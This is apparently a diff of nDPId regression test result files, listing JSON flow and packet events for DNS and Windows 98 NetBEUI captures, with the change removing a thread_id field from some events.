00225{"basic_event_id":12,"basic_event_name":"nDPI IPv6\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":39,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":334,"global_ts_msec":1560869905233} 00211{"basic_event_id":12,"basic_event_name":"nDPI IPv6\/L4 payload detection failed","datalink":1,"packet_id":39,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":334,"global_ts_msec":1560869905233}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869910534,"flow_last_seen":1560869910534,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869910534,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869910534,"flow_last_seen":1560869910534,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869910534,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1560869910534,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1560869910534,"pkt":"CFsOoYNeAAwpfKTLCABFAABQVdgAAEARt8DC9wUGwRjj7spPADUAPG1Sic4BIAABAAAAAAABCHdlYmVybGFiAmRlAAAwAAEAACkQAAAAgAAADAAKAAgdxATcWA6WbA=="} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1560869910534,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1560869910534,"pkt":"CFsOoYNeAAwpfKTLCABFAABQVdgAAEARt8DC9wUGwRjj7spPADUAPG1Sic4BIAABAAAAAAABCHdlYmVybGFiAmRlAAAwAAEAACkQAAAAgAAADAAKAAgdxATcWA6WbA=="}
00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869910534,"flow_last_seen":1560869910534,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869910534,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869910534,"flow_last_seen":1560869910534,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869910534,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
02439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1560869910547,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1560869910547,"pkt":"AAwpfKTLCFsOoYNeCABFAAXc3KUgAEARC2fBGOPuwvcFBgA1yk8Gysn4ic6FAAABAAQAAAABCHdlYmVybGFiAmRlAAAwAAHADAAwAAEAAAA8AQgBAAMKAwEAAdBU3CjxUKw7SeYza7cxyq\/Xg3znVQsMzuF\/UeLaigOubtJHhxhL+m129IxQkTKo8JRIXcKXD+aViztiml8+8BPCXFNPftFpdFCzBRNGHj\/ca1g\/Flck6v5avafB\/hGqbWKY2LEGKb5ktYWGj8JB0mrKGqDZVPyieC0dYVv02iOaOvUhdl7QtgVybR3V6gHlhoG0BxG+GbjUp+NyPClbuMOIwflbVGB5946PyQGQgnGNX2L1MHumOaYC\/D3UnyzQZNMmqj85GwDNPwEeDfLq6wm1BUfx7MwwcEVuO2B0YmUyiPiSfUoGTwm2P1nGNMhlYij3bY9VvyxCqPQnK0s5Tr3ADAAwAAEAAAA8AggBAQMKAwEAAd3v\/e0irXYKOwtYEB3VPe7z99qvi5le9\/y1XXyplp5y\/5xaqrm\/relG8pgx8GsNW2IgviJKAJ6UiU45ERKoH+fz2qf2SUFHFWwkweiWyLZ4EZHhowviCEx94P4OswNKXmdYHe38rlHPa+3OypW9gYfR9lhCKK3neCPq8\/aFFsTTI7dQ+Q2kERWiCMCybl4WOwsBo\/RlnPM4yufMKIlABiM5NWQPNmI6jYzAYpYoyUhd9HnnIIDlNQ89HpXQdFmysMraXYb7qDOoOEiOodttKH0y\/vtJ2SRU05RF4AEumacIUzAi5LL2cMQxC7t7rlDI4X42NRfOLAqGuOeclFjzqz3OdAJWeg\/AAnSbb02AGCkQ370TX1hWveAXt6xpPWOLgHXSLIF\/lz+wl+Dm8ZNWDnn5zEJuEj3xova1g8zmRXJOmqA6VhGqewxF8c+yKeNEOHz4X4\/RLmWHIuEbvboP00Dk5A9bhyZGVsytOJg+NwhFQtvBWLmD82FFtfSt2vmbFFNwAZOnRZWJOG9L7TFcGIm1OEULmohUyFLsBGMXDFOu1k0o6pqm495tsBuMyJNpfdQoPwOkUpsKi6jmNq6vRjvvNiJbcFylTQrqHGTGuOopuUsBbUXj\/nOr4I6j42k6GDIuTyLDkaVrdrxXmGnfNnStdqWmvHXo\/YFwdls9bcT7wAwALgABAAAAPAIfADAKAgAAADxdJ7GwXQAjwTN7CHdlYmVybGFiAmRlAMNkyiFqw0LN1nL6pdP6L0S5f+KeVqgdySg9DqllQznkc4qJdbBsIXZuBHa9Nq2W1+B1AxiyMctv3Lz\/wrXrHVsg2juMeE+GJDeZk+eFENsLzX3+aD8MAmUR+jj88geuho5ceQSzFyUDdJ+XlfOoxjx0giMIxIhGiGanPdqN3WDxDmc+G+u6JOLetuSRoW68C7okFrNLG+mUFMZGwuLAP+R5PUfRyHsFVzWhnrGaSrLry8iwPrcWPWvU+u3umasIdMK4SCw7vwP10JC5YIuQlDEZRVcmPkIjce\/vEUWCm7ZZ0rsSIQEfmsemGNvyEk8V6nVyCDOB1I7uCvg8vXpRAniloVYSi+VJJIo3oKpXQqXNjlQqmgLhs5xEyKK6ORyAtFwnMM2NNw\/n3r316JEFhydJQ27s1H8BA6wt7WBwYExhUjby5cAGKMUkk9RhAUVEopBhjLtTxq6B+h0kKU0z7k+MOs3tVRqjJb8K1sWKAtlqN79JssWSh32hOS6Gd60vt\/ISeUZ\/EqYRnbXyo9ywoMlGtHLKZz5Z1n609xm9BevoBVLtFlKhRNX\/7l1V3aRa64XbDmuycAg5TfDAgQ+GxPCr2eOFv0Gn2M4wfcUVujiys29jimhw6z0uJzU6zzXdu7tXJDPc2u\/\/F884++8b\/+59w8Q7XcWcHt3CD\/KZN567w2MALgABAAAAPAEfADAKAgAAADxdJ7GwXQAjwZBHCHdlYmVybGFiAmRlAKU8TJxFacYrnzjzribJyhzI\/PZTM81o7M0N53bVhGij+9zhJRM="} 02439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1560869910547,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1560869910547,"pkt":"AAwpfKTLCFsOoYNeCABFAAXc3KUgAEARC2fBGOPuwvcFBgA1yk8Gysn4ic6FAAABAAQAAAABCHdlYmVybGFiAmRlAAAwAAHADAAwAAEAAAA8AQgBAAMKAwEAAdBU3CjxUKw7SeYza7cxyq\/Xg3znVQsMzuF\/UeLaigOubtJHhxhL+m129IxQkTKo8JRIXcKXD+aViztiml8+8BPCXFNPftFpdFCzBRNGHj\/ca1g\/Flck6v5avafB\/hGqbWKY2LEGKb5ktYWGj8JB0mrKGqDZVPyieC0dYVv02iOaOvUhdl7QtgVybR3V6gHlhoG0BxG+GbjUp+NyPClbuMOIwflbVGB5946PyQGQgnGNX2L1MHumOaYC\/D3UnyzQZNMmqj85GwDNPwEeDfLq6wm1BUfx7MwwcEVuO2B0YmUyiPiSfUoGTwm2P1nGNMhlYij3bY9VvyxCqPQnK0s5Tr3ADAAwAAEAAAA8AggBAQMKAwEAAd3v\/e0irXYKOwtYEB3VPe7z99qvi5le9\/y1XXyplp5y\/5xaqrm\/relG8pgx8GsNW2IgviJKAJ6UiU45ERKoH+fz2qf2SUFHFWwkweiWyLZ4EZHhowviCEx94P4OswNKXmdYHe38rlHPa+3OypW9gYfR9lhCKK3neCPq8\/aFFsTTI7dQ+Q2kERWiCMCybl4WOwsBo\/RlnPM4yufMKIlABiM5NWQPNmI6jYzAYpYoyUhd9HnnIIDlNQ89HpXQdFmysMraXYb7qDOoOEiOodttKH0y\/vtJ2SRU05RF4AEumacIUzAi5LL2cMQxC7t7rlDI4X42NRfOLAqGuOeclFjzqz3OdAJWeg\/AAnSbb02AGCkQ370TX1hWveAXt6xpPWOLgHXSLIF\/lz+wl+Dm8ZNWDnn5zEJuEj3xova1g8zmRXJOmqA6VhGqewxF8c+yKeNEOHz4X4\/RLmWHIuEbvboP00Dk5A9bhyZGVsytOJg+NwhFQtvBWLmD82FFtfSt2vmbFFNwAZOnRZWJOG9L7TFcGIm1OEULmohUyFLsBGMXDFOu1k0o6pqm495tsBuMyJNpfdQoPwOkUpsKi6jmNq6vRjvvNiJbcFylTQrqHGTGuOopuUsBbUXj\/nOr4I6j42k6GDIuTyLDkaVrdrxXmGnfNnStdqWmvHXo\/YFwdls9bcT7wAwALgABAAAAPAIfADAKAgAAADxdJ7GwXQAjwTN7CHdlYmVybGFiAmRlAMNkyiFqw0LN1nL6pdP6L0S5f+KeVqgdySg9DqllQznkc4qJdbBsIXZuBHa9Nq2W1+B1AxiyMctv3Lz\/wrXrHVsg2juMeE+GJDeZk+eFENsLzX3+aD8MAmUR+jj88geuho5ceQSzFyUDdJ+XlfOoxjx0giMIxIhGiGanPdqN3WDxDmc+G+u6JOLetuSRoW68C7okFrNLG+mUFMZGwuLAP+R5PUfRyHsFVzWhnrGaSrLry8iwPrcWPWvU+u3umasIdMK4SCw7vwP10JC5YIuQlDEZRVcmPkIjce\/vEUWCm7ZZ0rsSIQEfmsemGNvyEk8V6nVyCDOB1I7uCvg8vXpRAniloVYSi+VJJIo3oKpXQqXNjlQqmgLhs5xEyKK6ORyAtFwnMM2NNw\/n3r316JEFhydJQ27s1H8BA6wt7WBwYExhUjby5cAGKMUkk9RhAUVEopBhjLtTxq6B+h0kKU0z7k+MOs3tVRqjJb8K1sWKAtlqN79JssWSh32hOS6Gd60vt\/ISeUZ\/EqYRnbXyo9ywoMlGtHLKZz5Z1n609xm9BevoBVLtFlKhRNX\/7l1V3aRa64XbDmuycAg5TfDAgQ+GxPCr2eOFv0Gn2M4wfcUVujiys29jimhw6z0uJzU6zzXdu7tXJDPc2u\/\/F884++8b\/+59w8Q7XcWcHt3CD\/KZN567w2MALgABAAAAPAEfADAKAgAAADxdJ7GwXQAjwZBHCHdlYmVybGFiAmRlAKU8TJxFacYrnzjzribJyhzI\/PZTM81o7M0N53bVhGij+9zhJRM="}
00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869910534,"flow_last_seen":1560869910547,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":762,"midstream":0,"thread_ts_msec":1560869910547,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869910534,"flow_last_seen":1560869910547,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":762,"midstream":0,"thread_ts_msec":1560869910547,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}}
00691{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":42,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":292,"pkt_l4_len":0,"thread_ts_msec":1560869910547,"pkt":"AAwpfKTLCFsOoYNeCABFAAEW3KUAuUARL3TBGOPuwvcFBl6hQbZluEkBQwQEC7uB5qnEntTXP5SqGQVKLxC7qNE6cyKHnHOaLFc6M7ZGIdPx4zNAweqKWt57GZ3P7usfiMKCCkCDZh6dEzOm+Gt\/T44RZQ2HCrp01hWU1aDVh\/WjEJGxnpeKral6aV7go6SChtYQKB0QtoychkpQnRa2kBkm4JsAg+9qTdiAdw09HhJvHWUpFM9bpDGMWwcnlf8HqY0xW2ob3vDNo7+6BXAfzVC3YuWmPlZvzvcC0xt3s5BgvCEnt+HEn3E0mfpKVVGnoL7U\/ZbK7\/tTSaA\/6wAAKRAAAACAAAAcAAoAGB3EBNxYDpZslD4VVl0I\/BakNFp6chM\/YQ=="} 00677{"packet_event_id":1,"packet_event_name":"packet","packet_id":42,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":292,"pkt_l4_len":0,"thread_ts_msec":1560869910547,"pkt":"AAwpfKTLCFsOoYNeCABFAAEW3KUAuUARL3TBGOPuwvcFBl6hQbZluEkBQwQEC7uB5qnEntTXP5SqGQVKLxC7qNE6cyKHnHOaLFc6M7ZGIdPx4zNAweqKWt57GZ3P7usfiMKCCkCDZh6dEzOm+Gt\/T44RZQ2HCrp01hWU1aDVh\/WjEJGxnpeKral6aV7go6SChtYQKB0QtoychkpQnRa2kBkm4JsAg+9qTdiAdw09HhJvHWUpFM9bpDGMWwcnlf8HqY0xW2ob3vDNo7+6BXAfzVC3YuWmPlZvzvcC0xt3s5BgvCEnt+HEn3E0mfpKVVGnoL7U\/ZbK7\/tTSaA\/6wAAKRAAAACAAAAcAAoAGB3EBNxYDpZslD4VVl0I\/BakNFp6chM\/YQ=="}
00224{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":42,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":258,"global_ts_msec":1560869910547} 00210{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":42,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":258,"global_ts_msec":1560869910547}
00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913732,"flow_last_seen":1560869913732,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869913732,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913732,"flow_last_seen":1560869913732,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869913732,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1560869913732,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":106,"pkt_l4_len":52,"thread_ts_msec":1560869913732,"pkt":"CFsOoYNeAAwpfKTLht1gCfvPADQRQCABBHAfCxawAgwp\/\/58pMsmBkcARwAAAAAAAAAAABER7IYANQA07tw\/fwEAAAEAAAAAAAEDbnMyCHdlYmVyZG5zAmRlAAAcAAEAACkCAAAAAAAAAA=="} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1560869913732,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":106,"pkt_l4_len":52,"thread_ts_msec":1560869913732,"pkt":"CFsOoYNeAAwpfKTLht1gCfvPADQRQCABBHAfCxawAgwp\/\/58pMsmBkcARwAAAAAAAAAAABER7IYANQA07tw\/fwEAAAEAAAAAAAEDbnMyCHdlYmVyZG5zAmRlAAAcAAEAACkCAAAAAAAAAA=="}
00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913732,"flow_last_seen":1560869913732,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869913732,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913732,"flow_last_seen":1560869913732,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869913732,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -158,6 +158,6 @@
~~ total memory freed........: 4698949 bytes ~~ total memory freed........: 4698949 bytes
~~ total allocations/frees...: 101262/101262 ~~ total allocations/frees...: 101262/101262
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 228 chars ~~ json string min len.......: 214 chars
~~ json string max len.......: 2446 chars ~~ json string max len.......: 2446 chars
~~ json string avg len.......: 1337 chars ~~ json string avg len.......: 1330 chars

484
test/results/dnscrypt-v1-and-resolver-pings.pcap.out
View File

File diff suppressed because it is too large Load Diff

638
test/results/dos_win98_smb_netbeui.pcap.out
View File

@@ -1,21 +1,21 @@
00472{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00472{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00479{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1576409796586} 00479{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1576409796586}
00368{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAACQAAAAAAAAAAAAAAAAAAAAAATURKUjk4ICAgICAgICAgAw=="} 00354{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAACQAAAAAAAAAAAAAAAAAAAAAATURKUjk4ICAgICAgICAgAw=="}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409796586} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409796586}
00368{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgAA=="} 00354{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgAA=="}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409796586} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409796586}
00368{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":3,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAABwAAAAAAAAAAAAAAAAAAAAAATURKUjk4ICAgICAgICAgAA=="} 00354{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAABwAAAAAAAAAAAAAAAAAAAAAATURKUjk4ICAgICAgICAgAA=="}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":3,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409796586} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":3,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409796586}
